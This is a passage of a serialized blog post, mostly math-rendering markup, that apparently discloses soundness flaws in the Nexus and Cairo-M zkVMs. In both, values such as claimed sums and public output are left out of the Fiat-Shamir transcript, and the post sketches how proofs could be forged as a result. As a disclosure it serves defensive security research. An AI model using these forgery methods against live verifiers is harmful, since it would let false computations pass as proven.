120862},[1841],[120864,120869],{"type":25,"tag":216,"props":120865,"children":120867},{"className":120866,"style":25584},[1841,4048,25583],[120868],{"type":31,"value":4052},{"type":25,"tag":216,"props":120870,"children":120872},{"className":120871},[2159],[120873],{"type":25,"tag":216,"props":120874,"children":120876},{"className":120875},[298,299],[120877,120906],{"type":25,"tag":216,"props":120878,"children":120880},{"className":120879},[304],[120881,120901],{"type":25,"tag":216,"props":120882,"children":120884},{"className":120883,"style":118191},[309],[120885],{"type":25,"tag":216,"props":120886,"children":120887},{"style":25607},[120888,120892],{"type":25,"tag":216,"props":120889,"children":120891},{"className":120890,"style":2181},[319],[],{"type":25,"tag":216,"props":120893,"children":120895},{"className":120894},[2186,2187,2188,2189],[120896],{"type":25,"tag":216,"props":120897,"children":120899},{"className":120898,"style":118207},[246,2151,2189],[120900],{"type":31,"value":12609},{"type":25,"tag":216,"props":120902,"children":120904},{"className":120903},[408],[120905],{"type":31,"value":411},{"type":25,"tag":216,"props":120907,"children":120909},{"className":120908},[304],[120910],{"type":25,"tag":216,"props":120911,"children":120913},{"className":120912,"style":118222},[309],[120914],{"type":25,"tag":216,"props":120915,"children":120916},{},[],{"type":25,"tag":216,"props":120918,"children":120920},{"className":120919,"style":1871},[257],[],{"type":25,"tag":216,"props":120922,"children":120924},{"className":120923},[246],[120925,120929,121083],{"type":25,"tag":216,"props":120926,"children":120928},{"className":120927},[287,288],[],{"type":25,"tag":216,"props":120930,"children":120932},{"className":120931},[293],[120933],{"type":25,"tag":216,"props":120934,"children":120936},{"className":120935},[298,299],[120937,121071],{"type":25,"tag":216,"props":120938,"children":120940},{"className":120939},[304],[120941,121066],{"type":25,"tag":216,"props":120942,"children":120944},{"className":120943,"style":117524},[309],[120945,121035,121046],{"type":25,"tag":216,"props":120946,"children":120947},{"style":5059},[120948,120952],{"type":25,"tag":216,"props":120949,"children":120951},{"className":120950,"style":320},[319],[],{"type":25,"tag":216,"props":120953,"children":120955},{"className":120954},[2186,2187,2188,2189],[120956],{"type":25,"tag":216,"props":120957,"children":120959},{"className":120958},[246,2189],[120960,120965,120970],{"type":25,"tag":216,"props":120961,"children":120963},{"className":120962,"style":117544},[246,2151,2189],[120964],{"type":31,"value":117547},{"type":25,"tag":216,"props":120966,"children":120968},{"className":120967},[340,2189],[120969],{"type":31,"value":3378},{"type":25,"tag":216,"props":120971,"children":120973},{"className":120972},[246,2189],[120974,120984],{"type":25,"tag":216,"props":120975,"children":120977},{"className":120976},[246,31,2189],[120978],{"type":25,"tag":216,"props":120979,"children":120981},{"className":120980},[246,2189],[120982],{"type":31,"value":120983},"produced",{"type":25,"tag":216,"props":120985,"children":120987},{"className":120986},[2159],[120988],{"type":25,"tag":216,"props":120989,"children":120991},{"className":120990},[298,299],[120992,121023],{"type":25,"tag":216,"props":120993,"children":120995},{"className":120994},[304],[120996,121018],{"type":25,"tag":216,"props":120997,"children":121000},{"className":120998,"style":120999},[309],"height:0.2052em;",[121001],{"type":25,"tag":216,"props":121002,"children":121004},{"style":121003},"top:-2.2341em;margin-right:0.0714em;",[121005,121009],{"type":25,"tag":216,"props":121006,"children":121008},{"className":121007,"style":5106},[319],[],{"type":25,"tag":216,"props":121010,"children":121012},{"className":121011},[2186,5111,5112,2189],[121013],{"type":25,"tag":216,"props":121014,"children":121016},{"className":121015,"style":118207},[246,2151,2189],[121017],{"type":31,"value":12609},{"type":25,"tag":216,"props":121019,"children":121021},{"className":121020},[408],[121022],{"type":31,"value":411},{"type":25,"tag":216,"props":121024,"children":121026},{"className":121025},[304],[121027],{"type":25,"tag":216,"props":121028,"children":121031},{"className":121029,"style":121030},[309],"height:0.4048em;",[121032],{"type":25,"tag":216,"props":121033,"children":121034},{},[],{"type":25,"tag":216,"props":121036,"children":121037},{"style":360},[121038,121042],{"type":25,"tag":216,"props":121039,"children":121041},{"className":121040,"style":320},[319],[],{"type":25,"tag":216,"props":121043,"children":121045},{"className":121044,"style":370},[369],[],{"type":25,"tag":216,"props":121047,"children":121048},{"style":117571},[121049,121053],{"type":25,"tag":216,"props":121050,"children":121052},{"className":121051,"style":320},[319],[],{"type":25,"tag":216,"props":121054,"children":121056},{"className":121055},[2186,2187,2188,2189],[121057],{"type":25,"tag":216,"props":121058,"children":121060},{"className":121059},[246,2189],[121061],{"type":25,"tag":216,"props":121062,"children":121064},{"className":121063},[246,2189],[121065],{"type":31,"value":184},{"type":25,"tag":216,"props":121067,"children":121069},{"className":121068},[408],[121070],{"type":31,"value":411},{"type":25,"tag":216,"props":121072,"children":121074},{"className":121073},[304],[121075],{"type":25,"tag":216,"props":121076,"children":121079},{"className":121077,"style":121078},[309],"height:0.6283em;",[121080],{"type":25,"tag":216,"props":121081,"children":121082},{},[],{"type":25,"tag":216,"props":121084,"children":121086},{"className":121085},[427,288],[],{"type":25,"tag":216,"props":121088,"children":121090},{"className":121089,"style":335},[257],[],{"type":25,"tag":216,"props":121092,"children":121094},{"className":121093},[340],[121095],{"type":31,"value":3378},{"type":25,"tag":216,"props":121097,"children":121099},{"className":121098,"style":335},[257],[],{"type":25,"tag":216,"props":121101,"children":121103},{"className":121102},[235],[121104,121108,121165,121169],{"type":25,"tag":216,"props":121105,"children":121107},{"className":121106,"style":118416},[240],[],{"type":25,"tag":216,"props":121109,"children":121111},{"className":121110},[1841],[121112,121117],{"type":25,"tag":216,"props":121113,"children":121115},{"className":121114,"style":25584},[1841,4048,25583],[121116],{"type":31,"value":4052},{"type":25,"tag":216,"props":121118,"children":121120},{"className":121119},[2159],[121121],{"type":25,"tag":216,"props":121122,"children":121124},{"className":121123},[298,299],[121125,121154],{"type":25,"tag":216,"props":121126,"children":121128},{"className":121127},[304],[121129,121149],{"type":25,"tag":216,"props":121130,"children":121132},{"className":121131,"style":117656},[309],[121133],{"type":25,"tag":216,"props":121134,"children":121135},{"style":25607},[121136,121140],{"type":25,"tag":216,"props":121137,"children":121139},{"className":121138,"style":2181},[319],[],{"type":25,"tag":216,"props":121141,"children":121143},{"className":121142},[2186,2187,2188,2189],[121144],{"type":25,"tag":216,"props":121145,"children":121147},{"className":121146,"style":98437},[246,2151,2189],[121148],{"type":31,"value":92655},{"type":25,"tag":216,"props":121150,"children":121152},{"className":121151},[408],[121153],{"type":31,"value":411},{"type":25,"tag":216,"props":121155,"children":121157},{"className":121156},[304],[121158],{"type":25,"tag":216,"props":121159,"children":121161},{"className":121160,"style":118471},[309],[121162],{"type":25,"tag":216,"props":121163,"children":121164},{},[],{"type":25,"tag":216,"props":121166,"children":121168},{"className":121167,"style":1871},[257],[],{"type":25,"tag":216,"props":121170,"children":121172},{"className":121171},[246],[121173,121177,121327],{"type":25,"tag":216,"props":121174,"children":121176},{"className":121175},[287,288],[],{"type":25,"tag":216,"props":121178,"children":121180},{"className":121179},[293],[121181],{"type":25,"tag":216,"props":121182,"children":121184},{"className":121183},[298,299],[121185,121316],{"type":25,"tag":216,"props":121186,"children":121188},{"className":121187},[304],[121189,121311],{"type":25,"tag":216,"props":121190,"children":121192},{"className":121191,"style":117524},[309],[121193,121280,121291],{"type":25,"tag":216,"props":121194,"children":121195},{"style":5059},[121196,121200],{"type":25,"tag":216,"props":121197,"children":121199},{"className":121198,"style":320},[319],[],{"type":25,"tag":216,"props":121201,"children":121203},{"className":121202},[2186,2187,2188,2189],[121204],{"type":25,"tag":216,"props":121205,"children":121207},{"className":121206},[246,2189],[121208,121213,121218],{"type":25,"tag":216,"props":121209,"children":121211},{"className":121210,"style":117544},[246,2151,2189],[121212],{"type":31,"value":117547},{"type":25,"tag":216,"props":121214,"children":121216},{"className":121215},[340,2189],[121217],{"type":31,"value":3378},{"type":25,"tag":216,"props":121219,"children":121221},{"className":121220},[246,2189],[121222,121232],{"type":25,"tag":216,"props":121223,"children":121225},{"className":121224},[246,31,2189],[121226],{"type":25,"tag":216,"props":121227,"children":121229},{"className":121228},[246,2189],[121230],{"type":31,"value":121231},"consumed",{"type":25,"tag":216,"props":121233,"children":121235},{"className":121234},[2159],[121236],{"type":25,"tag":216,"props":121237,"children":121239},{"className":121238},[298,299],[121240,121269],{"type":25,"tag":216,"props":121241,"children":121243},{"className":121242},[304],[121244,121264],{"type":25,"tag":216,"props":121245,"children":121247},{"className":121246,"style":5097},[309],[121248],{"type":25,"tag":216,"props":121249,"children":121250},{"style":118561},[121251,121255],{"type":25,"tag":216,"props":121252,"children":121254},{"className":121253,"style":5106},[319],[],{"type":25,"tag":216,"props":121256,"children":121258},{"className":121257},[2186,5111,5112,2189],[121259],{"type":25,"tag":216,"props":121260,"children":121262},{"className":121261,"style":98437},[246,2151,2189],[121263],{"type":31,"value":92655},{"type":25,"tag":216,"props":121265,"children":121267},{"className":121266},[408],[121268],{"type":31,"value":411},{"type":25,"tag":216,"props":121270,"children":121272},{"className":121271},[304],[121273],{"type":25,"tag":216,"props":121274,"children":121276},{"className":121275,"style":118588},[309],[121277],{"type":25,"tag":216,"props":121278,"children":121279},{},[],{"type":25,"tag":216,"props":121281,"children":121282},{"style":360},[121283,121287],{"type":25,"tag":216,"props":121284,"children":121286},{"className":121285,"style":320},[319],[],{"type":25,"tag":216,"props":121288,"children":121290},{"className":121289,"style":370},[369],[],{"type":25,"tag":216,"props":121292,"children":121293},{"style":117571},[121294,121298],{"type":25,"tag":216,"props":121295,"children":121297},{"className":121296,"style":320},[319],[],{"type":25,"tag":216,"props":121299,"children":121301},{"className":121300},[2186,2187,2188,2189],[121302],{"type":25,"tag":216,"props":121303,"children":121305},{"className":121304},[246,2189],[121306],{"type":25,"tag":216,"props":121307,"children":121309},{"className":121308},[246,2189],[121310],{"type":31,"value":184},{"type":25,"tag":216,"props":121312,"children":121314},{"className":121313},[408],[121315],{"type":31,"value":411},{"type":25,"tag":216,"props":121317,"children":121319},{"className":121318},[304],[121320],{"type":25,"tag":216,"props":121321,"children":121323},{"className":121322,"style":118636},[309],[121324],{"type":25,"tag":216,"props":121325,"children":121326},{},[],{"type":25,"tag":216,"props":121328,"children":121330},{"className":121329},[427,288],[],{"type":25,"tag":38,"props":121332,"children":121333},{},[121334,121336,121341],{"type":31,"value":121335},"All ",{"type":25,"tag":82,"props":121337,"children":121339},{"className":121338},[],[121340],{"type":31,"value":118848},{"type":31,"value":121342}," values must sum to zero (everything produced is consumed).",{"type":25,"tag":38,"props":121344,"children":121345},{},[121346,121348,121353],{"type":31,"value":121347},"All constraints are combined into a composition polynomial. The verifier then checks this polynomial at a random point outside the execution domain, known as an ",{"type":25,"tag":9273,"props":121349,"children":121350},{},[121351],{"type":31,"value":121352},"OODS (Out-of-Domain Sampling)",{"type":31,"value":121354}," test.",{"type":25,"tag":38,"props":121356,"children":121357},{},[121358],{"type":25,"tag":9273,"props":121359,"children":121360},{},[121361],{"type":31,"value":119399},{"type":25,"tag":206,"props":121363,"children":121365},{"code":121364},"NexusProof {\n    stark_proof: {\n        commitments: [Merkle roots of trace columns]\n        sampled_values: [polynomial evaluations]\n        fri_proof: [low-degree test proof]\n    }\n    claimed_sum: [FieldElement; NUM_COMPONENTS]  // \u003C- VULNERABLE\n    log_size: [component sizes]\n}\n",[121366],{"type":25,"tag":82,"props":121367,"children":121368},{"__ignoreMap":7},[121369],{"type":31,"value":121364},{"type":25,"tag":38,"props":121371,"children":121372},{},[121373,121375,121380],{"type":31,"value":121374},"The",{"type":25,"tag":82,"props":121376,"children":121378},{"className":121377},[],[121379],{"type":31,"value":118848},{"type":31,"value":121381}," values are checked to be of correct length, that they sum to zero, and are used in the final composition polynomial. But at no point were they absorbed into the transcript.",{"type":25,"tag":38,"props":121383,"children":121384},{},[121385],{"type":25,"tag":6467,"props":121386,"children":121389},{"alt":121387,"src":121388},"6_nexus_flow","/posts/zkvms-unfaithful-claims/6_nexus_flow.svg",[],{"type":25,"tag":38,"props":121391,"children":121392},{},[121393,121395,121404],{"type":31,"value":121394},"The OODS check computes the composition polynomial, which includes logup boundary constraints. These constraints are ",{"type":25,"tag":9273,"props":121396,"children":121397},{},[121398,121399],{"type":31,"value":115863},{"type":25,"tag":82,"props":121400,"children":121402},{"className":121401},[],[121403],{"type":31,"value":118848},{"type":31,"value":1472},{"type":25,"tag":38,"props":121406,"children":121407},{},[121408],{"type":31,"value":121409},"The composition polynomial is a random linear combination of constraints:",{"type":25,"tag":38,"props":121411,"children":121412},{},[121413],{"type":25,"tag":82,"props":121414,"children":121416},{"className":121415},[212,4702],[121417],{"type":25,"tag":216,"props":121418,"children":121420},{"className":121419},[224],[121421],{"type":25,"tag":216,"props":121422,"children":121424},{"className":121423,"ariaHidden":230},[229],[121425,121466,121605],{"type":25,"tag":216,"props":121426,"children":121428},{"className":121427},[235],[121429,121433,121438,121443,121448,121453,121457,121462],{"type":25,"tag":216,"props":121430,"children":121432},{"className":121431,"style":5513},[240],[],{"type":25,"tag":216,"props":121434,"children":121436},{"className":121435,"style":26065},[246,2151],[121437],{"type":31,"value":120212},{"type":25,"tag":216,"props":121439,"children":121441},{"className":121440},[287],[121442],{"type":31,"value":1850},{"type":25,"tag":216,"props":121444,"children":121446},{"className":121445},[246,2151],[121447],{"type":31,"value":2541},{"type":25,"tag":216,"props":121449,"children":121451},{"className":121450},[427],[121452],{"type":31,"value":1888},{"type":25,"tag":216,"props":121454,"children":121456},{"className":121455,"style":258},[257],[],{"type":25,"tag":216,"props":121458,"children":121460},{"className":121459},[263],[121461],{"type":31,"value":266},{"type":25,"tag":216,"props":121463,"children":121465},{"className":121464,"style":258},[257],[],{"type":25,"tag":216,"props":121467,"children":121469},{"className":121468},[235],[121470,121474,121531,121535,121592,121596,121601],{"type":25,"tag":216,"props":121471,"children":121473},{"className":121472,"style":119616},[240],[],{"type":25,"tag":216,"props":121475,"children":121477},{"className":121476},[1841],[121478,121483],{"type":25,"tag":216,"props":121479,"children":121481},{"className":121480,"style":25584},[1841,4048,25583],[121482],{"type":31,"value":4052},{"type":25,"tag":216,"props":121484,"children":121486},{"className":121485},[2159],[121487],{"type":25,"tag":216,"props":121488,"children":121490},{"className":121489},[298,299],[121491,121520],{"type":25,"tag":216,"props":121492,"children":121494},{"className":121493},[304],[121495,121515],{"type":25,"tag":216,"props":121496,"children":121498},{"className":121497,"style":118191},[309],[121499],{"type":25,"tag":216,"props":121500,"children":121501},{"style":25607},[121502,121506],{"type":25,"tag":216,"props":121503,"children":121505},{"className":121504,"style":2181},[319],[],{"type":25,"tag":216,"props":121507,"children":121509},{"className":121508},[2186,2187,2188,2189],[121510],{"type":25,"tag":216,"props":121511,"children":121513},{"className":121512},[246,2151,2189],[121514],{"type":31,"value":2289},{"type":25,"tag":216,"props":121516,"children":121518},{"className":121517},[408],[121519],{"type":31,"value":411},{"type":25,"tag":216,"props":121521,"children":121523},{"className":121522},[304],[121524],{"type":25,"tag":216,"props":121525,"children":121527},{"className":121526,"style":118471},[309],[121528],{"type":25,"tag":216,"props":121529,"children":121530},{},[],{"type":25,"tag":216,"props":121532,"children":121534},{"className":121533,"style":1871},[257],[],{"type":25,"tag":216,"props":121536,"children":121538},{"className":121537},[246],[121539,121544],{"type":25,"tag":216,"props":121540,"children":121542},{"className":121541,"style":119071},[246,2151],[121543],{"type":31,"value":119074},{"type":25,"tag":216,"props":121545,"children":121547},{"className":121546},[2159],[121548],{"type":25,"tag":216,"props":121549,"children":121551},{"className":121550},[298,299],[121552,121581],{"type":25,"tag":216,"props":121553,"children":121555},{"className":121554},[304],[121556,121576],{"type":25,"tag":216,"props":121557,"children":121559},{"className":121558,"style":2270},[309],[121560],{"type":25,"tag":216,"props":121561,"children":121562},{"style":119706},[121563,121567],{"type":25,"tag":216,"props":121564,"children":121566},{"className":121565,"style":2181},[319],[],{"type":25,"tag":216,"props":121568,"children":121570},{"className":121569},[2186,2187,2188,2189],[121571],{"type":25,"tag":216,"props":121572,"children":121574},{"className":121573},[246,2151,2189],[121575],{"type":31,"value":2289},{"type":25,"tag":216,"props":121577,"children":121579},{"className":121578},[408],[121580],{"type":31,"value":411},{"type":25,"tag":216,"props":121582,"children":121584},{"className":121583},[304],[121585],{"type":25,"tag":216,"props":121586,"children":121588},{"className":121587,"style":2209},[309],[121589],{"type":25,"tag":216,"props":121590,"children":121591},{},[],{"type":25,"tag":216,"props":121593,"children":121595},{"className":121594,"style":335},[257],[],{"type":25,"tag":216,"props":121597,"children":121599},{"className":121598},[340],[121600],{"type":31,"value":343},{"type":25,"tag":216,"props":121602,"children":121604},{"className":121603,"style":335},[257],[],{"type":25,"tag":216,"props":121606,"children":121608},{"className":121607},[235],[121609,121613,121675,121680,121685],{"type":25,"tag":216,"props":121610,"children":121612},{"className":121611,"style":5513},[240],[],{"type":25,"tag":216,"props":121614,"children":121616},{"className":121615},[246],[121617,121627],{"type":25,"tag":216,"props":121618,"children":121620},{"className":121619},[246,31],[121621],{"type":25,"tag":216,"props":121622,"children":121624},{"className":121623},[246],[121625],{"type":31,"value":121626},"constraint",{"type":25,"tag":216,"props":121628,"children":121630},{"className":121629},[2159],[121631],{"type":25,"tag":216,"props":121632,"children":121634},{"className":121633},[298,299],[121635,121664],{"type":25,"tag":216,"props":121636,"children":121638},{"className":121637},[304],[121639,121659],{"type":25,"tag":216,"props":121640,"children":121642},{"className":121641,"style":2270},[309],[121643],{"type":25,"tag":216,"props":121644,"children":121645},{"style":118114},[121646,121650],{"type":25,"tag":216,"props":121647,"children":121649},{"className":121648,"style":2181},[319],[],{"type":25,"tag":216,"props":121651,"children":121653},{"className":121652},[2186,2187,2188,2189],[121654],{"type":25,"tag":216,"props":121655,"children":121657},{"className":121656},[246,2151,2189],[121658],{"type":31,"value":2289},{"type":25,"tag":216,"props":121660,"children":121662},{"className":121661},[408],[121663],{"type":31,"value":411},{"type":25,"tag":216,"props":121665,"children":121667},{"className":121666},[304],[121668],{"type":25,"tag":216,"props":121669,"children":121671},{"className":121670,"style":2209},[309],[121672],{"type":25,"tag":216,"props":121673,"children":121674},{},[],{"type":25,"tag":216,"props":121676,"children":121678},{"className":121677},[287],[121679],{"type":31,"value":1850},{"type":25,"tag":216,"props":121681,"children":121683},{"className":121682},[246,2151],[121684],{"type":31,"value":2541},{"type":25,"tag":216,"props":121686,"children":121688},{"className":121687},[427],[121689],{"type":31,"value":1888},{"type":25,"tag":38,"props":121691,"children":121692},{},[121693,121695,121700,121702,121707],{"type":31,"value":121694},"Since each constraint is linear in its ",{"type":25,"tag":82,"props":121696,"children":121698},{"className":121697},[],[121699],{"type":31,"value":118848},{"type":31,"value":121701},", the overall composition polynomial is linear in all ",{"type":25,"tag":82,"props":121703,"children":121705},{"className":121704},[],[121706],{"type":31,"value":118848},{"type":31,"value":121708}," values.",{"type":25,"tag":38,"props":121710,"children":121711},{},[121712,121714],{"type":31,"value":121713},"The verifier checks ",{"type":25,"tag":82,"props":121715,"children":121717},{"className":121716},[212,4702],[121718],{"type":25,"tag":216,"props":121719,"children":121721},{"className":121720},[224],[121722],{"type":25,"tag":216,"props":121723,"children":121725},{"className":121724,"ariaHidden":230},[229],[121726,121787],{"type":25,"tag":216,"props":121727,"children":121729},{"className":121728},[235],[121730,121734,121739,121744,121754,121759,121769,121774,121778,121783],{"type":25,"tag":216,"props":121731,"children":121733},{"className":121732,"style":96960},[240],[],{"type":25,"tag":216,"props":121735,"children":121737},{"className":121736,"style":26065},[246,2151],[121738],{"type":31,"value":120212},{"type":25,"tag":216,"props":121740,"children":121742},{"className":121741},[287],[121743],{"type":31,"value":1850},{"type":25,"tag":216,"props":121745,"children":121747},{"className":121746},[246,31],[121748],{"type":25,"tag":216,"props":121749,"children":121751},{"className":121750},[246],[121752],{"type":31,"value":121753},"oods",{"type":25,"tag":216,"props":121755,"children":121757},{"className":121756,"style":2752},[246],[121758],{"type":31,"value":7031},{"type":25,"tag":216,"props":121760,"children":121762},{"className":121761},[246,31],[121763],{"type":25,"tag":216,"props":121764,"children":121766},{"className":121765},[246],[121767],{"type":31,"value":121768},"point",{"type":25,"tag":216,"props":121770,"children":121772},{"className":121771},[427],[121773],{"type":31,"value":1888},{"type":25,"tag":216,"props":121775,"children":121777},{"className":121776,"style":258},[257],[],{"type":25,"tag":216,"props":121779,"children":121781},{"className":121780},[263],[121782],{"type":31,"value":266},{"type":25,"tag":216,"props":121784,"children":121786},{"className":121785,"style":258},[257],[],{"type":25,"tag":216,"props":121788,"children":121790},{"className":121789},[235],[121791,121795],{"type":25,"tag":216,"props":121792,"children":121794},{"className":121793,"style":1519},[240],[],{"type":25,"tag":216,"props":121796,"children":121798},{"className":121797},[246,31],[121799],{"type":25,"tag":216,"props":121800,"children":121802},{"className":121801},[246],[121803],{"type":31,"value":120537},{"type":25,"tag":38,"props":121805,"children":121806},{},[121807,121809,121814,121816,121821],{"type":31,"value":121808},"With ",{"type":25,"tag":82,"props":121810,"children":121812},{"className":121811},[],[121813],{"type":31,"value":118848},{"type":31,"value":121815}," not in transcript, the composition polynomial becomes a linear function of the ",{"type":25,"tag":82,"props":121817,"children":121819},{"className":121818},[],[121820],{"type":31,"value":118848},{"type":31,"value":121822}," values. Combined with the constraint that claimed sums must sum to zero, this is a small linear system that is easily solvable.",{"type":25,"tag":38,"props":121824,"children":121825},{},[121826,121830,121832],{"type":25,"tag":9273,"props":121827,"children":121828},{},[121829],{"type":31,"value":120693},{"type":31,"value":121831}," Fixed on October 24, 2025 via ",{"type":25,"tag":162,"props":121833,"children":121836},{"href":121834,"rel":121835},"https://github.com/nexus-xyz/nexus-zkvm/pull/503",[166],[121837],{"type":31,"value":121838},"PR #503",{"type":25,"tag":22753,"props":121840,"children":121841},{},[],{"type":25,"tag":606,"props":121843,"children":121845},{"id":121844},"cairo-m-kakarot-labs",[121846],{"type":31,"value":121847},"Cairo-M (Kakarot Labs)",{"type":25,"tag":38,"props":121849,"children":121850},{},[121851],{"type":31,"value":121852},"Cairo-M, built by Kakarot Labs, is an alternative proof system for the Cairo VM (used by Starknet).",{"type":25,"tag":38,"props":121854,"children":121855},{},[121856],{"type":31,"value":121857},"Cairo-M is in many ways similar to Nexus. It uses logup to prove global statements about the execution.",{"type":25,"tag":38,"props":121859,"children":121860},{},[121861],{"type":25,"tag":9273,"props":121862,"children":121863},{},[121864],{"type":31,"value":119399},{"type":25,"tag":206,"props":121866,"children":121868},{"code":121867},"Proof {\n    claim: ComponentSizes,\n    interaction_claim: LogupClaimsPerComponent,\n    public_data: {          // \u003C- VULNERABLE\n        initial_registers: { pc, fp },\n        final_registers: { pc, fp }, // \u003C- forged\n        clock,                       // \u003C- forged\n        initial_root,                \n        final_root,                  // \u003C- forged\n        public_memory: { program, input, output }, //output modified\n    },\n    stark_proof: [...],\n}\n",[121869],{"type":25,"tag":82,"props":121870,"children":121871},{"__ignoreMap":7},[121872],{"type":31,"value":121867},{"type":25,"tag":38,"props":121874,"children":121875},{},[121876],{"type":25,"tag":9273,"props":121877,"children":121878},{},[121879],{"type":31,"value":119415},{"type":25,"tag":38,"props":121881,"children":121882},{},[121883],{"type":25,"tag":6467,"props":121884,"children":121887},{"alt":121885,"src":121886},"7_cairo_m_verification","/posts/zkvms-unfaithful-claims/7_cairo_m_verification.svg",[],{"type":25,"tag":38,"props":121889,"children":121890},{},[121891,121893,121899],{"type":31,"value":121892},"Lookup challenges are derived without ",{"type":25,"tag":82,"props":121894,"children":121896},{"className":121895},[],[121897],{"type":31,"value":121898},"public_data",{"type":31,"value":121900}," being  mixed into the transcript.",{"type":25,"tag":38,"props":121902,"children":121903},{},[121904,121905,121910,121912,121917],{"type":31,"value":474},{"type":25,"tag":82,"props":121906,"children":121908},{"className":121907},[],[121909],{"type":31,"value":121898},{"type":31,"value":121911}," (program I/O, boundary registers, memory roots) enters the lookup relations inside ",{"type":25,"tag":64,"props":121913,"children":121914},{},[121915],{"type":31,"value":121916},"denominators",{"type":31,"value":121918}," through challenge-weighted encodings of tuples. Abstractly, the verifier checks a relation of the form:",{"type":25,"tag":38,"props":121920,"children":121921},{},[121922],{"type":25,"tag":82,"props":121923,"children":121925},{"className":121924},[212,4702],[121926],{"type":25,"tag":216,"props":121927,"children":121929},{"className":121928},[224],[121930],{"type":25,"tag":216,"props":121931,"children":121933},{"className":121932,"ariaHidden":230},[229],[121934,121994,122040,122086],{"type":25,"tag":216,"props":121935,"children":121937},{"className":121936},[235],[121938,121942,121948,121953,121962,121967,121976,121981,121985,121990],{"type":25,"tag":216,"props":121939,"children":121941},{"className":121940,"style":96960},[240],[],{"type":25,"tag":216,"props":121943,"children":121945},{"className":121944},[246,2151],[121946],{"type":31,"value":121947},"L",{"type":25,"tag":216,"props":121949,"children":121951},{"className":121950},[287],[121952],{"type":31,"value":1850},{"type":25,"tag":216,"props":121954,"children":121956},{"className":121955},[246,31],[121957],{"type":25,"tag":216,"props":121958,"children":121960},{"className":121959},[246],[121961],{"type":31,"value":65643},{"type":25,"tag":216,"props":121963,"children":121965},{"className":121964,"style":2752},[246],[121966],{"type":31,"value":7031},{"type":25,"tag":216,"props":121968,"children":121970},{"className":121969},[246,31],[121971],{"type":25,"tag":216,"props":121972,"children":121974},{"className":121973},[246],[121975],{"type":31,"value":7669},{"type":25,"tag":216,"props":121977,"children":121979},{"className":121978},[427],[121980],{"type":31,"value":1888},{"type":25,"tag":216,"props":121982,"children":121984},{"className":121983,"style":335},[257],[],{"type":25,"tag":216,"props":121986,"children":121988},{"className":121987},[340],[121989],{"type":31,"value":3539},{"type":25,"tag":216,"props":121991,"children":121993},{"className":121992,"style":335},[257],[],{"type":25,"tag":216,"props":121995,"children":121997},{"className":121996},[235],[121998,122002,122012,122017,122027,122031,122036],{"type":25,"tag":216,"props":121999,"children":122001},{"className":122000,"style":96960},[240],[],{"type":25,"tag":216,"props":122003,"children":122005},{"className":122004},[246,31],[122006],{"type":25,"tag":216,"props":122007,"children":122009},{"className":122008},[246],[122010],{"type":31,"value":122011},"(other transcript",{"type":25,"tag":216,"props":122013,"children":122015},{"className":122014,"style":2752},[246],[122016],{"type":31,"value":7031},{"type":25,"tag":216,"props":122018,"children":122020},{"className":122019},[246,31],[122021],{"type":25,"tag":216,"props":122022,"children":122024},{"className":122023},[246],[122025],{"type":31,"value":122026},"bound terms)",{"type":25,"tag":216,"props":122028,"children":122030},{"className":122029,"style":258},[257],[],{"type":25,"tag":216,"props":122032,"children":122034},{"className":122033},[263],[122035],{"type":31,"value":266},{"type":25,"tag":216,"props":122037,"children":122039},{"className":122038,"style":258},[257],[],{"type":25,"tag":216,"props":122041,"children":122043},{"className":122042},[235],[122044,122049,122054,122059,122064,122068,122073,122077,122082],{"type":25,"tag":216,"props":122045,"children":122048},{"className":122046,"style":122047},[240],"height:0.8778em;vertical-align:-0.1944em;",[],{"type":25,"tag":216,"props":122050,"children":122052},{"className":122051},[246],[122053],{"type":31,"value":1882},{"type":25,"tag":216,"props":122055,"children":122057},{"className":122056},[1864],[122058],{"type":31,"value":1867},{"type":25,"tag":216,"props":122060,"children":122063},{"className":122061,"style":122062},[257],"margin-right:2em;",[],{"type":25,"tag":216,"props":122065,"children":122067},{"className":122066,"style":1871},[257],[],{"type":25,"tag":216,"props":122069,"children":122071},{"className":122070},[246,2151],[122072],{"type":31,"value":121947},{"type":25,"tag":216,"props":122074,"children":122076},{"className":122075,"style":258},[257],[],{"type":25,"tag":216,"props":122078,"children":122080},{"className":122079},[263],[122081],{"type":31,"value":266},{"type":25,"tag":216,"props":122083,"children":122085},{"className":122084,"style":258},[257],[],{"type":25,"tag":216,"props":122087,"children":122089},{"className":122088},[235],[122090,122095,122152,122156,122374],{"type":25,"tag":216,"props":122091,"children":122094},{"className":122092,"style":122093},[240],"height:1.4071em;vertical-align:-0.562em;",[],{"type":25,"tag":216,"props":122096,"children":122098},{"className":122097},[1841],[122099,122104],{"type":25,"tag":216,"props":122100,"children":122102},{"className":122101,"style":25584},[1841,4048,25583],[122103],{"type":31,"value":4052},{"type":25,"tag":216,"props":122105,"children":122107},{"className":122106},[2159],[122108],{"type":25,"tag":216,"props":122109,"children":122111},{"className":122110},[298,299],[122112,122141],{"type":25,"tag":216,"props":122113,"children":122115},{"className":122114},[304],[122116,122136],{"type":25,"tag":216,"props":122117,"children":122119},{"className":122118,"style":118191},[309],[122120],{"type":25,"tag":216,"props":122121,"children":122122},{"style":25607},[122123,122127],{"type":25,"tag":216,"props":122124,"children":122126},{"className":122125,"style":2181},[319],[],{"type":25,"tag":216,"props":122128,"children":122130},{"className":122129},[2186,2187,2188,2189],[122131],{"type":25,"tag":216,"props":122132,"children":122134},{"className":122133},[246,2151,2189],[122135],{"type":31,"value":2289},{"type":25,"tag":216,"props":122137,"children":122139},{"className":122138},[408],[122140],{"type":31,"value":411},{"type":25,"tag":216,"props":122142,"children":122144},{"className":122143},[304],[122145],{"type":25,"tag":216,"props":122146,"children":122148},{"className":122147,"style":118471},[309],[122149],{"type":25,"tag":216,"props":122150,"children":122151},{},[],{"type":25,"tag":216,"props":122153,"children":122155},{"className":122154,"style":1871},[257],[],{"type":25,"tag":216,"props":122157,"children":122159},{"className":122158},[246],[122160,122164,122370],{"type":25,"tag":216,"props":122161,"children":122163},{"className":122162},[287,288],[],{"type":25,"tag":216,"props":122165,"children":122167},{"className":122166},[293],[122168],{"type":25,"tag":216,"props":122169,"children":122171},{"className":122170},[298,299],[122172,122358],{"type":25,"tag":216,"props":122173,"children":122175},{"className":122174},[304],[122176,122353],{"type":25,"tag":216,"props":122177,"children":122179},{"className":122178,"style":117524},[309],[122180,122322,122333],{"type":25,"tag":216,"props":122181,"children":122182},{"style":5059},[122183,122187],{"type":25,"tag":216,"props":122184,"children":122186},{"className":122185,"style":320},[319],[],{"type":25,"tag":216,"props":122188,"children":122190},{"className":122189},[2186,2187,2188,2189],[122191],{"type":25,"tag":216,"props":122192,"children":122194},{"className":122193},[246,2189],[122195,122200,122205,1